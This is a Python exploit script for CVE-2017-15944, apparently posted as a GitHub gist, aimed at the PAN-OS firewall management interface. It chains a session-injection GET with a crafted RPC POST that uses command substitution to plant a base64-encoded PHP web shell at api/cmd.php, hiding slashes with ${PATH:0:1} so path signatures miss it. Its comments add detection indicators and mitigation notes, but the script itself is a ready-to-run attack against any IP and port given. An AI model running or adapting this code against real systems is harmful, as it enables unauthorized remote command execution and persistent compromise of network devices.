
@milo2012
Created July 19, 2021 14:29
CVE-2017-15944_1.py
#!/usr/bin/env python
# encoding: utf-8
import requests
import sys
import base64
# Suppress every urllib3 warning. The requests further down pass verify=False
# (no TLS certificate validation), which would otherwise emit an
# InsecureRequestWarning on each call.
requests.packages.urllib3.disable_warnings()
# A single shared Session: cookies set by the first request in exploit() are
# sent automatically with the second one.
session = requests.Session()
def step3_exp():
    """Return the fixed request body that exploit() POSTs to Administrator.get.

    The body is a JSON RPC envelope (action "PanDirect", method "execute",
    type "rpc") whose third data element carries the injected content in its
    "id" field:

    * The value closes a quoted string after "admin" and appends what look
      like extra XML attributes (async-mode, refresh, cookie), a self-closing
      tag end and a Unicode NUL escape -- presumably to break out of a
      server-side XML request; confirm against the CVE-2017-15944 advisory.
    * The cookie attribute starts with a run of "../" segments ending in
      var/cores/ and then embeds a $(...) shell substitution that pipes a
      base64 string through "base64 -d" into .../htdocs/api/cmd.php.
    * The base64 string decodes to a one-line PHP script that hands the "c"
      query parameter to system().
    * ${PATH:0:1} is a shell substring expansion standing in for "/", so a
      signature keyed on the literal /var/appweb/htdocs path will not match
      this body.

    Indicators a responder can take from this: an unexpected cmd.php under the
    api web directory, entries under /var/cores whose names contain shell
    metacharacters, and POST bodies to Administrator.get that contain
    async-mode= or cookie= inside the "id" value.
    """
    # Returned verbatim; the string is never formatted or parameterised.
    return "{\"action\":\"PanDirect\",\"method\":\"execute\",\"data\":[\"07c5807d0d927dcd0980f86024e5208b\",\"Administrator.get\",{\"changeMyPassword\":true,\"template\":\"asd\",\"id\":\"admin']\\\" async-mode='yes' refresh='yes' cookie='../../../../../../var/cores/$(echo PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==|base64 -d >${PATH:0:1}var${PATH:0:1}appweb${PATH:0:1}htdocs${PATH:0:1}api${PATH:0:1}cmd.php).core -print -exec python -c exec(\\\"PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==\\\".decode(\\\"base64\\\")) ;'/>\\u0000\"}],\"type\":\"rpc\",\"tid\":713}"
def exploit(target, port):
    """Send the two-request sequence to https://target:port and print the result.

    Request 1 is a GET to /esp/cms_changeDeviceContext.esp; only if it returns
    HTTP 200 is request 2 sent, a POST of the step3_exp() body to
    /php/utils/router.php/Administrator.get. Both use the module-level
    ``session``, so the order matters: whatever cookie the first response sets
    is what the second request presents.

    The ``device`` query value contains an encoded quote followed by a
    ``user|s...`` fragment, which looks like PHP session-serialisation syntax
    -- presumably the session-injection step of CVE-2017-15944; confirm
    against the vendor advisory.

    For detection, the pair is distinctive in management-interface web logs: a
    GET to cms_changeDeviceContext.esp whose ``device`` parameter contains
    quote, semicolon or pipe characters, followed from the same client by a
    POST to router.php/Administrator.get. Mitigation is the vendor's fixed
    PAN-OS release for this CVE and limiting which networks can reach the
    management web interface.

    Args:
        target: Host name or IP address, interpolated into both URLs.
        port: Port, interpolated into both URLs.

    Returns:
        None. Calls exit() with a message when request 1 is not 200 or when
        the JSON reply does not report success.
    """
    step2_url = 'https://{}:{}/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";'.format(target, port)
    step3_url = 'https://{}:{}/php/utils/router.php/Administrator.get'.format(target, port)
    # Disabled debugging aid: routes the session through a local intercepting proxy.
    #proxies = {'https': 'http://127.0.0.1:8080'}
    #session.proxies.update(proxies)
    try:
        # verify=False: the server certificate is not validated on either request.
        if session.get(step2_url, verify=False).status_code == 200:
            exp_post = step3_exp()
            print(step3_url)
            print(exp_post)
            # .json() raises if the reply is not JSON; that lands in the except below.
            rce = session.post(step3_url, data=exp_post, verify=False).json()
            print(rce)
            # A missing key here raises KeyError, which is also only printed below.
            if rce['result']['@status'] == 'success':
                print('[+] Success, please wait ... ')
                print('[+] JobID: {}'.format(rce['result']['result']['job']))
            else:
                # exit() raises SystemExit, which is not an Exception subclass,
                # so it passes through the handler below and ends the process.
                exit('[!] Fail')
        else:
            exit('[!] Bypass fail')
    except Exception as err:
        # Connection, decoding and lookup errors are printed and otherwise
        # ignored; the function then returns None.
        print(err)
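if __name__ == '__main__':
    # Exactly two positional arguments (IP and PORT) are required. The previous
    # `<= 3` test also accepted zero or one argument and then failed with an
    # IndexError on sys.argv[1] / sys.argv[2] instead of printing the usage line.
    if len(sys.argv) == 3:
        exploit(sys.argv[1], sys.argv[2])
    else:
        # sys.exit rather than the site-provided exit(), which is not
        # guaranteed to exist (e.g. under `python -S`).
        sys.exit('[+] Usage: python CVE_2017_15944.py IP PORT')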